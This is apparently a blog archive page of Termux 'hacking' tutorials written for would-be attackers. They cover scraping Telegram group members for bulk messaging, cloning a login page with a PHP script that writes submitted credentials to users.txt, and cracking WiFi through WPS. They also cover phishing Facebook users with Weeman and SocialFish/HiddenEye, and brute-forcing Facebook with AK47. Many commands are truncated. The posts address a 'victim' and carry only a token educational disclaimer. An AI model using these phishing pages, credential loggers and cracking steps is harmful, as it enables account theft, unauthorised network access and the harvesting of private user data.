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Showing posts with label Termux. Show all posts
Showing posts with label Termux. Show all posts

Tuesday 15 September 2020

How to use Telegram Scraper in Termux

 Let me tell you how this tool is to help you

By using this Telegram Scraper Tool you can Scrap all Members data in a Telegram group and send them direct messages, you can add them to your new group

So without wasting time let's see how to install it

In order to use this tool, you must have a Telegram Account, just follow these simple steps to get started

How to use Termux Scraper in Termux

Step 1: Firstly Install Termux from Playstore

Step 2: Now Open Termux and type This Command

And Grant Storage access to Termux

Step 3: 

Now Type this Command

apt update && apt upgrade

Step 4: Now type this command to install python 3

pkg install python

Step 4: now we have to install git

For that type this command

pkg install git

Step 5: Now type this command to install TeleGram-Scraper Tool

git clone

Step 6:

After that type this command

cd TeleGram-Scraper

Then type ls

Step 7:

Now you have to Setup the requirements

For that type this command

python -i

And install the requirements by typing y

Step 8: 

Now you have to Configure the API Keys

For that type

python -c



And login thereby providing your phone number and verification code

If you haven't created any app then create one

After that click on API-Documentation

Then copy App Id, API Hash

Now go back to Termux and type App Id and hit enter, then it will ask for API Hash, just copy and paste the API Hash and hit enter

It will ask for your Phone number, just give your number and hit enter that's all your setup is ready

Step 9: Now Everything is fine

Telegram Scrapper in Termux

Just type this command to use Telegram Scraper


And select any group by typing the number

It will Scrap all the members of the group and will be saved as members.csv

You can send them bulk SMS by typing

python members.csv

You can add them to your group by typing

python members.csv

That's all you have known how to install and use Telegram Scraper Tool in Termux

How To Create Phishing Page For Any Website (Easy Tutorial)

 In this tutorial am gonna teach you how to create your own Phishing pages for your desired websites , this tutorial is very easy but you must have some patient with little skills to do 

Also Read: What Is Phishing and How To Secure Your Accounts from This attack

As you know phishing requires some coding knowledge such as HTML, CSS, JavaScript and little PHP , if you don't have any idea about it then its very difficult to create your own Phishing Page 

If you have at least the basics of HTML then follow this tutorial to create your own Phishing page else leave this tutorial its not for you 

How To Create  Phishing Page Step By Guide

In order To create your own phishing page you have to find your target website , I mean you have to get the website's login portal 

Mostly people search for How To create phishing page for Facebook , in Facebook the login portal is visible in the main page so here you need not to find out the login page 

Here am Not Confusing you by writing too much 

If you want to create  phishing page for a particular website then open the website in a good web browser such as chrome 

If you want to create phishing page for Facebook then open 

Then right click on mouse you will see a Option view source code then click on it 

Or you can directly press CTRL+U to see the source code 

Most of the people search for How To Create Your phishing page with android Mobile , there is no Source code viewer option so how to do 

to view source code of any website you can search for online source code viewers

But in android you can type view-source: 
In front of url to see the source code 

Now Copy all the Source code starting from <html> to the end tag of </html> 

Now open Notepad and paste the copied codes 

Now find the tag <form action="

And replace login.php in action 


<form action="login.php"

Now save the file as index.html

In android you can use droid edit app to edit html  files 

copy below code and save it as

header ('Location:');
$handle = fopen("users.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

You can change with any url 

Now create another file 

Don't write anything just save as users.txt  

Now you have all Done 

Just upload all the files ( index.html, login.php and users.txt )to a free web hosting server and make sure you give chmod 777 permission to users.text file

Finally This tutorial is only for educational purpose , we are not responsible for any misuse

How To Hack WiFi in Android [ Root , No Root]

 In this tutorial am going to explain how to hack wifi in android

Nowadays people wonders how to hack someone's WiFi with their smartphone and you may also tried a lot, if you're still wondering how to hack wifi password on android  then here is a tutorial to hack WiFi with Android Mobile Root + No Root Methods, so follow Below steps to how to hack wifi in android

How to hack wifi with android phone

Things Required : 

•Android Mobile with 5.1 Lolipop or above

•Android Mobile's version below 5.0 root must be Required

WPS WPA tester android app

How To Hack WiFi With Android without Root

Most of the people think we can hack WiFi with Rooted Android Mobile but we can Hack WiFi without Rooting Our Mobile

Follow Below steps to hack WiFi password on your Android without root

Firstly Download the WPS WPA tester app and install that app

After successful installation open the app
How To Hack WiFi With Android
and search for available WiFi networks by clicking the WPS button you Will observe two type of signal symbols, Green, and red shown as above screenshot 
We can hack only those networks which shows Green signals

Click on the network which you want to hack
now you will be shown many pins don't worry click on Automatic Connect

Wait few minutes you will be shown SUCCESS..!  If the WiFi  network is Hacked and you will be automatically connected, to see the password you need root permission

How To Hack WiFi With Android Rooted Phone

As you know guys Rooting Android gives some special privileges, if you don't know How To Root your Android Mobile then Follow this Simple Tutorial To Root your Android Mobile

After Rooting you have to Install Busybox On your Android so Follow This Tutorial To Install BusyBox in Your Android

After that Download WPS WPA Tester App and Follow the same

If your phone is rooted then you will see the network's password and you will be connected to the network
That's all you have been hacked the WiFi network

How to Hack Facebook With Termux (Updated)

 Hey guys, we are back with a simple tutorial to hack facebook with Termux by using Weeman Tool

after getting a lot of requests from our users, we decided to post this article about how to hack fb with termux

We have already posted an article about how to use Termux and Installation of some Hacking Tools, if you have missed that article then

You Can Read It here: Hacking with Termux App

This Tutorials is Only For Educational Purposes Only and we are no more responsible for any mistake you do

Okay, now let me tell you what is Weeman, and how to install and use it on Termux Android app, finally use it your own risk and hack facebook,

Installing Weeman In Termux and Hacking Facebook

What you will learn in this post
  • What is Weeman
  • Installing Weeman In Termux
  • Installing SocialFish In Termux
  • Installing AK47 in Termux
  • Installing Python 2 in Termux
  • Finally hack Facebook with Termux

What is Weeman

Weeman is a simple but effective python tool for phishing, with this tool you can easily do phishing on any website, you can do phishing on Facebook to hack facebook accounts,

let me tell you how to use weeman in termux 
This tool can be used to do phishing on various websites like Gmail, Twitter etc,
Okay cool, now let's go to the tutorial point

Firstly download and install Termux app on your Android
Then open Termux and type these commands and hit enter

apt update && upgrade

Now give permission to Termux to access your memory
So type below command


Then type this command to install python2

pkg install python2

During installation of python2 you will be asked " Termux will use some space"
Just type Y and hit enter
Now you have to install git, for that type this command

pkg install git

After successfully installing git, type below command to install Weeman

git clone

After that type this command

cd weeman && ls

Now you have to type below command to run Weeman on Python


Now you will see the Weeman user interface, its time to set all the necessary command

firstly you have to find your IP address, it is important so that you can find your IP address through termux

Just open a new tab on termux and type below command to see your IP


Hack Facebook with termux

Now you got your IP address, now type below commands to get started

set url
set action_url
set port 8080

Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to

How To Hack Facebook Using Termux (Weeman)

If you're targeting Facebook mobile users then set the url to
Eg: set url
Now finally type this command


Setting up weeman in termux

that's all you have successfully executed all the commands to hack Facebook

Now you have to share your IP with your victim to get his username and password

so send a link to your victim as http://Your_IP:8080


Executing weeman in victim browser

When your victim opens the link then it will open a phishing page and when they enter their email and password then you will easily get them as shown in the screenshot

hack Facebook with termux

How To Install SocialFish in Termux to Hack Facebook

SocialFish tool in Termux

SocialFish is Collection of Advanced Phishing Tools, we can use SocialFish in Termux to Hack Facebook, so let's see how we can install it on Termux

Firstly install Termux

Type below commands 

apt update && apt upgrade

Then type

git clone

Then type

cd SocialFish

Then type

pip install -r requirements.txt

Now type


chmod +x

Finally Type 


Just use your brain to know how to use it

You can install SocialFish Tool developed by Anon U4DY in Termux By Using Only One Command

Just copy and paste below command in Termux

pkg install git python php curl openssh grep && pip3 install wget && git clone && cd HiddenEye && chmod 777 && python

Install AK47 Facebook Brute Forcing Tool in Termux

Ak47 in Termux

Firstly let me say that Bruteforcing Facebook is a shit Nowadays, Facebook and many other sites are updating their Own AI to Detect Britefore Attack and Block The Requests, still if you're interested then try this tool

Type Below Commands To install

pkg install python2 


pkg install git

Then type

git clone

Now type ls

Then type

cd AK47

Then type

chmod +x *

Now type ls

Then type


And select Facebook brute and follow the instruction

Conclusion :

Hope you guys learnt how to hack facebook account with termux,
 This tutorial is only for educational purpose, we are not responsible for any misuse

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